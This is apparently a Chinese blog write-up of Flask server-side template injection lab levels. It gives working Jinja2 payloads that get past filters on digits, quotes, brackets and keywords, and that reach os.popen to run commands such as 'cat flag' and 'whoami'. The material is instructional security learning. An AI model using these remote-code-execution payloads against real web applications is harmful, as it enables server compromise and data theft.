<h2 id="Level-9-bypass-number"><a href="#Level-9-bypass-number" class="headerlink" title="Level 9 bypass number"></a>Level 9 bypass number</h2><p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210926143646554.png" srcset="/img/loading.gif" lazyload alt="image-20210926143646554"></p>
<p>从提示可以看出ban了所有数字,所以这道题得想办法构造数字.使用过滤器<code>|length</code>可以绕过</p>
<p>使用过滤器构造132</p>
<p><code>{% set a=&#39;aaaaaaaaaaa&#39;|length*&#39;aaa&#39;|length*&#39;aaaa&#39;|length %}{{a}}</code></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210926150339261.png" srcset="/img/loading.gif" lazyload alt="image-20210926150339261"></p>
<p><code>{{()[&#39;__class__&#39;][&#39;__base__&#39;][&#39;__subclasses__&#39;]()[132][&#39;__init__&#39;][&#39;__globals__&#39;][&#39;popen&#39;](&#39;cat flag&#39;)[&#39;read&#39;]()}}</code></p>
<p>构造payload,拿到flag</p>
<p><code>{% set a=&#39;aaaaaaaaaaa&#39;|length*&#39;aaa&#39;|length*&#39;aaaa&#39;|length %}{{()[&#39;__class__&#39;][&#39;__base__&#39;][&#39;__subclasses__&#39;]()[a][&#39;__init__&#39;][&#39;__globals__&#39;][&#39;popen&#39;](&#39;cat flag&#39;)[&#39;read&#39;]()}}</code></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210926150534193.png" srcset="/img/loading.gif" lazyload alt="image-20210926150534193"></p>
<h2 id="Level-10"><a href="#Level-10" class="headerlink" title="Level 10"></a>Level 10</h2><p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210926143655782.png" srcset="/img/loading.gif" lazyload alt="image-20210926143655782"></p>
<p>这一关的目的是拿到config,当我们使用<code>{{config}}</code>以及<code>{{self}}</code>时都返回了None.看来是被ban了,所以得重新寻找一个储存相关信息的变量.</p>
<p><a target="_blank" rel="noopener" href="https://ctftime.org/writeup/11036">通过寻找</a>,发现存在这么一个变量<code>current_app</code>是我们需要的.<a target="_blank" rel="noopener" href="http://docs.jinkan.org/docs/flask/appcontext.html">官网</a>对<code>current_app</code>提供了这么一句说明</p>
<blockquote>
<p>应用上下文会在必要时被创建和销毁。它不会在线程间移动，并且也不会在不同的请求之间共享。正因为如此，它是一个存储数据库连接信息或是别的东西的最佳位置。</p>
</blockquote>
<p>因此,此处能使用<code>current_app</code>绕过.</p>
<p>构造payload,拿到config<br><code>{{url_for.__globals__[&#39;current_app&#39;].config}}</code><br><code>{{get_flashed_messages.__globals__[&#39;current_app&#39;].config}}</code></p>
<h2 id="Level-11-bypass-combination1"><a href="#Level-11-bypass-combination1" class="headerlink" title="Level 11 bypass combination1"></a>Level 11 bypass combination1</h2><p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210926143712383.png" srcset="/img/loading.gif" lazyload alt="image-20210926143712383"><br>这一关颜色和之前不同,感觉难度会有所增加.</p>
<p>绕过<code>&#39; &quot;</code>可以用request构造get参数代替,但是request 被ban了,request 可以使用字符串拼接构造,但是<code>&#39; &quot;</code>又被ban了,<code>.</code>被过滤可以用<code>[]</code>绕过,但是<code>[]</code>也被ban了.<code>[]</code>可以用<code>__getitem__</code>绕过,<code>.</code>可以用<code>attr</code>绕过,这两个没有被过滤,说明还是有希望.现在关键就是怎么绕过<code>&#39; 和 &quot;</code>.</p>
<p>再<code>Level 9 bypass keyword</code> 的扩展中,使用过滤器<code>dict()|join</code>构造关键子的过程中没有出现<code>&#39; &quot;</code>,可以使用这种办法绕过.</p>
<p><code>{%set a=dict(__cla=a,ss__=b)|join%}{{()|attr(a)}}</code></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210926170311552.png" srcset="/img/loading.gif" lazyload alt="image-20210926170311552"></p>
<p>不过在后面构造命令<code>cat flag</code>时空格无法识别.通过这篇<a target="_blank" rel="noopener" href="https://buaq.net/go-74232.html">博客</a>,发现了新思路.</p>
<h3 id="绕过空格"><a href="#绕过空格" class="headerlink" title="绕过空格"></a>绕过空格</h3><p>通过以下构造可以得到字符串,举个例,可以发现输出的字符串中存在空格、部分数字、<code>&lt;</code>以及部分字母.利用过滤器<code>list</code>将其变为列表类型再配合使用索引,就能得到我们想要的.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;% <span class="hljs-built_in">set</span> org = (&#123; &#125;|select()|string()) %&#125;&#123;&#123;org&#125;&#125;<br>&#123;% <span class="hljs-built_in">set</span> org = (self|string()) %&#125;&#123;&#123;org&#125;&#125;<br>&#123;% <span class="hljs-built_in">set</span> org = self|string|urlencode %&#125;&#123;&#123;org&#125;&#125;<br>&#123;% <span class="hljs-built_in">set</span> org = (app.__doc__|string) %&#125;&#123;&#123;org&#125;&#125;<br></code></pre></td></tr></table></figure>

<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210927143907669.png" srcset="/img/loading.gif" lazyload alt="image-20210927143907669"></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210927144342078.png" srcset="/img/loading.gif" lazyload alt="image-20210927144342078"></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210927144420692.png" srcset="/img/loading.gif" lazyload alt="image-20210927144420692"></p>
<p>同理,使用urlencode中还出现了百分号.在<code>%</code>被过滤时可以尝试使用这种方法进行绕过.</p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210927144625707.png" srcset="/img/loading.gif" lazyload alt="image-20210927144625707"></p>
<p>构造payload,拿到flag</p>
<blockquote>
<p>payload原型:().__class__.__base__.__subclasses__()[132].__init__.__globals__[‘popen’](‘cat flag’).read()</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;%<span class="hljs-built_in">set</span> a=<span class="hljs-built_in">dict</span>(__cla=a,ss__=b)|join %&#125;  <span class="hljs-comment"># __class__</span><br>&#123;%<span class="hljs-built_in">set</span> b=<span class="hljs-built_in">dict</span>(__bas=a,e__=b)|join %&#125;	  <span class="hljs-comment"># __basess__</span><br>&#123;%<span class="hljs-built_in">set</span> c=<span class="hljs-built_in">dict</span>(__subcla=a,sses__=b)|join %&#125;    <span class="hljs-comment"># __subclasses__</span><br>&#123;%<span class="hljs-built_in">set</span> d=<span class="hljs-built_in">dict</span>(__ge=a,titem__=a)|join%&#125;    <span class="hljs-comment"># __getitem__</span><br>&#123;%<span class="hljs-built_in">set</span> e=<span class="hljs-built_in">dict</span>(__<span class="hljs-keyword">in</span>=a,it__=b)|join %&#125;		 <span class="hljs-comment"># __init__</span><br>&#123;%<span class="hljs-built_in">set</span> f=<span class="hljs-built_in">dict</span>(__glo=a,bals__=b)|join %&#125;	<span class="hljs-comment"># __globals__</span><br>&#123;%<span class="hljs-built_in">set</span> g=<span class="hljs-built_in">dict</span>(pop=a,en=b)|join %&#125;	<span class="hljs-comment"># popen</span><br>&#123;%<span class="hljs-built_in">set</span> h=self|string|attr(d)(<span class="hljs-number">18</span>)%&#125;	<span class="hljs-comment"># 空格</span><br>&#123;%<span class="hljs-built_in">set</span> i=(<span class="hljs-built_in">dict</span>(cat=abc)|join,h,<span class="hljs-built_in">dict</span>(flag=b)|join)|join%&#125;  <span class="hljs-comment"># cat flag</span><br>&#123;%<span class="hljs-built_in">set</span> j=<span class="hljs-built_in">dict</span>(read=a)|join%&#125; <span class="hljs-comment"># read</span><br>&#123;&#123;()|attr(a)|attr(b)|attr(c)()|attr(d)(<span class="hljs-number">132</span>)|attr(e)|attr(f)|attr(d)(g)(i)|attr(j)()&#125;&#125;<br></code></pre></td></tr></table></figure>




<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210927125630695.png" srcset="/img/loading.gif" lazyload alt="image-20210927125630695"></p>
<h2 id="Level-12-bypass-combination2"><a href="#Level-12-bypass-combination2" class="headerlink" title="Level 12 bypass combination2"></a>Level 12 bypass combination2</h2><p><img src="data/image-20210926143720285.png" srcset="/img/loading.gif" lazyload alt="image-20210926143720285"></p>
<p>这一关和上一关的区别在于 没有过滤<code>request</code>,但是过滤了数字.所以可以使用<code>request.args</code>绕过.</p>
<p>不过<code>request|attr(&quot;args&quot;)|attr(&quot;a&quot;)</code>并不能获取到通过get传递过来的<code>a参数</code>,所以这里得跟换为<code>request.args.get()</code>来获取get参数</p>
<p>如果还是从<code>().__class__</code>构造,那代码段就太冗长了.通过搜索,在羽师父的博客中学到了一条简洁的构造链.</p>
<p><code>{{x.__init__.__globals__[&#39;__builtins__&#39;]}}</code></p>
<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210927145707004.png" srcset="/img/loading.gif" lazyload alt="image-20210927145707004"></p>
<p>构造payload,拿到flag</p>
<blockquote>
<p>payload原型: x.__init__.__globals__[‘__builtins__‘]<a href="%22__import__('os').popen('whoami').read()%22">‘eval’</a></p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;%<span class="hljs-built_in">set</span> a=&#123;&#125;|select|string|<span class="hljs-built_in">list</span>%&#125;<br>&#123;%<span class="hljs-built_in">set</span> b=<span class="hljs-built_in">dict</span>(pop=a)|join%&#125;<br>&#123;%<span class="hljs-built_in">set</span> c=a|attr(b)(self|string|length)%&#125;  <span class="hljs-comment"># _</span><br>&#123;%<span class="hljs-built_in">set</span> d=(c,c,<span class="hljs-built_in">dict</span>(getitem=a)|join,c,c)|join%&#125;  <span class="hljs-comment"># __getitem__</span><br>&#123;%<span class="hljs-built_in">set</span> e=<span class="hljs-built_in">dict</span>(args=a)|join%&#125;		<span class="hljs-comment"># args</span><br>&#123;%<span class="hljs-built_in">set</span> f=<span class="hljs-built_in">dict</span>(get=a)|join%&#125;		<span class="hljs-comment"># get</span><br>&#123;%<span class="hljs-built_in">set</span> g=<span class="hljs-built_in">dict</span>(z=a)|join%&#125;		<br>&#123;%<span class="hljs-built_in">set</span> gg=<span class="hljs-built_in">dict</span>(zz=a)|join%&#125;<br>&#123;%<span class="hljs-built_in">set</span> ggg=<span class="hljs-built_in">dict</span>(zzz=a)|join%&#125;<br>&#123;%<span class="hljs-built_in">set</span> gggg=<span class="hljs-built_in">dict</span>(zzzz=a)|join%&#125;<br>&#123;%<span class="hljs-built_in">set</span> ggggg=<span class="hljs-built_in">dict</span>(zzzzz=a)|join%&#125;<br>&#123;&#123;x|attr(request|attr(e)|attr(f)(g))|attr(request|attr(e)|attr(f)(gg))|attr(d)(request|attr(e)|attr(f)(ggg))|attr(d)(request|attr(e)|attr(f)(gggg))(request|attr(e)|attr(f)(ggggg))&#125;&#125;<br></code></pre></td></tr></table></figure>

<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210927125427004.png" srcset="/img/loading.gif" lazyload alt="image-20210927125427004"></p>
<h2 id="Level-13-bypass-combination3"><a href="#Level-13-bypass-combination3" class="headerlink" title="Level 13 bypass combination3"></a>Level 13 bypass combination3</h2><p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210926143742060.png" srcset="/img/loading.gif" lazyload alt="image-20210926143742060"></p>
<p>这道题把<code>request</code>给ban了,过滤了更多关键字,不过还是可以用<code>Level 12</code>的思路</p>
<p>构造payload,拿到flag</p>
<blockquote>
<p>payload原型:x.__init__.__globals__[‘__builtins__‘][‘__import__‘](‘os’).popen(‘cat flag’).read()”)</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;%<span class="hljs-built_in">set</span> a=&#123;&#125;|select|string|<span class="hljs-built_in">list</span>%&#125;<br>&#123;%<span class="hljs-built_in">set</span> ax=&#123;&#125;|select|string|<span class="hljs-built_in">list</span>%&#125;<br>&#123;%<span class="hljs-built_in">set</span> aa=<span class="hljs-built_in">dict</span>(ssss=a)|join%&#125;<br>&#123;%<span class="hljs-built_in">set</span> aaa=<span class="hljs-built_in">dict</span>(ssssss=a)|join%&#125;<br>&#123;%<span class="hljs-built_in">set</span> aaaa=<span class="hljs-built_in">dict</span>(ss=a)|join%&#125;<br>&#123;%<span class="hljs-built_in">set</span> aaaaa=<span class="hljs-built_in">dict</span>(sssss=a)|join%&#125;<br>&#123;%<span class="hljs-built_in">set</span> b=<span class="hljs-built_in">dict</span>(pop=a)|join%&#125;   <span class="hljs-comment"># pop</span><br>&#123;%<span class="hljs-built_in">set</span> c=a|attr(b)(aa|length*aaa|length)%&#125;  <span class="hljs-comment"># _</span><br>&#123;%<span class="hljs-built_in">set</span> cc=a|attr(b)(aaaa|length*aaaaa|length)%&#125; <span class="hljs-comment"># 空格</span><br>&#123;%<span class="hljs-built_in">set</span> d=(c,c,<span class="hljs-built_in">dict</span>(get=a,item=a)|join,c,c)|join%&#125;  <span class="hljs-comment"># __getitem__</span><br>&#123;%<span class="hljs-built_in">set</span> dd=(c,c,<span class="hljs-built_in">dict</span>(<span class="hljs-keyword">in</span>=a,it=a)|join,c,c)|join%&#125;   <span class="hljs-comment"># __init__</span><br>&#123;%<span class="hljs-built_in">set</span> ddd=(c,c,<span class="hljs-built_in">dict</span>(glob=a,als=a)|join,c,c)|join%&#125;   <span class="hljs-comment"># __globals__</span><br>&#123;%<span class="hljs-built_in">set</span> dddd=(c,c,<span class="hljs-built_in">dict</span>(buil=a,tins=a)|join,c,c)|join%&#125;   <span class="hljs-comment"># __builtins__</span><br>&#123;%<span class="hljs-built_in">set</span> e=(c,c,<span class="hljs-built_in">dict</span>(impo=a,rt=a)|join,c,c)|join%&#125;   <span class="hljs-comment"># __import__</span><br>&#123;%<span class="hljs-built_in">set</span> ee=(<span class="hljs-built_in">dict</span>(o=a,s=a)|join)|join%&#125;   <span class="hljs-comment"># os</span><br>&#123;%<span class="hljs-built_in">set</span> eee=(<span class="hljs-built_in">dict</span>(po=a,pen=a)|join)|join%&#125;  <span class="hljs-comment"># popen</span><br>&#123;%<span class="hljs-built_in">set</span> eeee=(<span class="hljs-built_in">dict</span>(cat=a)|join,cc,<span class="hljs-built_in">dict</span>(flag=a)|join)|join%&#125;  <span class="hljs-comment"># cat flag</span><br>&#123;%<span class="hljs-built_in">set</span> f=(<span class="hljs-built_in">dict</span>(rea=a,d=a)|join)|join%&#125;  <span class="hljs-comment"># read</span><br>&#123;&#123;x|attr(dd)|attr(ddd)|attr(d)(dddd)|attr(d)(e)(ee)|attr(eee)(eeee)|attr(f)()&#125;&#125;<br></code></pre></td></tr></table></figure>

<p><img src="https://particles.oss-cn-beijing.aliyuncs.com/img/image-20210927111652753.png" srcset="/img/loading.gif" lazyload alt="image-20210927111652753"></p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>本篇文章主要介绍了<code>Flask</code>的服务端模板注入.其漏洞成因大多数是因为程序员的偷懒或者安全意识较低.</p>
<p><code>SSTI</code>既然属于代码注入,那漏洞利用必然是想法设法去实现执行代码.在<code>Flask</code>中,我们可以通过类与类之间的继承关系拿到能够执行代码的函数,从而进行<code>RCE</code>.</p>
<p><code>ssti</code>的基础payload构造形如:</p>
<p><code>().__class__.__base__.__subclasses__()[64].__init__.__globals__[&#39;__import__&#39;](&#39;os&#39;).system(&#39;whoami&#39;)</code></p>
<p>但在某些特定情况下可能存在不同字符的过滤,我们需要通过 <code>python</code>的一些内在特性或内建方法,尝试对被过滤字符进行构造.上面练习已经简单实现了部分字符bypass,但还不完全.读者可以尝试自行探索出更有趣的payload.</p>
<p>关于<code>Flask SSTI</code>的防御,推荐使用更安全的<code>rander_template()</code>代替<code>rander_template_string()</code>.</p>
<p>学无止境,希望这边能对各位师傅们有所帮助.</p>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/3679">https://xz.aliyun.com/t/3679</a><br><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/250481.html">https://www.freebuf.com/articles/web/250481.html</a><br><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/226900">https://www.anquanke.com/post/id/226900</a><br><a target="_blank" rel="noopener" href="https://misakikata.github.io/2020/04/python-%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8%E4%B8%8ESSTI">https://misakikata.github.io/2020/04/python-%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8%E4%B8%8ESSTI</a><br><a target="_blank" rel="noopener" href="https://buaq.net/go-74232.html">https://buaq.net/go-74232.html</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/miuzzx/article/details/110220425">https://blog.csdn.net/miuzzx/article/details/110220425</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/">刷题记录</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/python/">python</a>
                    
                      <a class="hover-with-bg" href="/tags/flask/">flask</a>
                    
                      <a class="hover-with-bg" href="/tags/ssti/">ssti</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/10/26/OA-Future/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">OA_Future</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/10/23/xss/">
                        <span class="hidden-mobile">xss</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
